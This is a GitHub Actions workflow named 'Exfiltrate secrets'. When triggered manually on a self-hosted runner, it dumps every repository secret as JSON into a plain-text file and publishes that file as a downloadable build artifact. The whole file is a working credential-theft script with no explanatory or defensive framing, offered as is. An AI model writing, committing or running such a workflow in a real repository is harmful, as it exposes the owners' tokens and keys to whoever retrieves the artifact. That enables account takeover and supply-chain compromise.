name: Exfiltrate secrets

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: self-hosted
    steps:
      - run: |
          echo "$ALLMYSECRETS" > secrets.json
        shell: bash
        env:
          ALLMYSECRETS: ${{ toJSON(secrets) }}

      - name: Upload secrets
        uses: actions/upload-artifact@v3.1.2
        with:
          name: secrets
          path: secrets.json
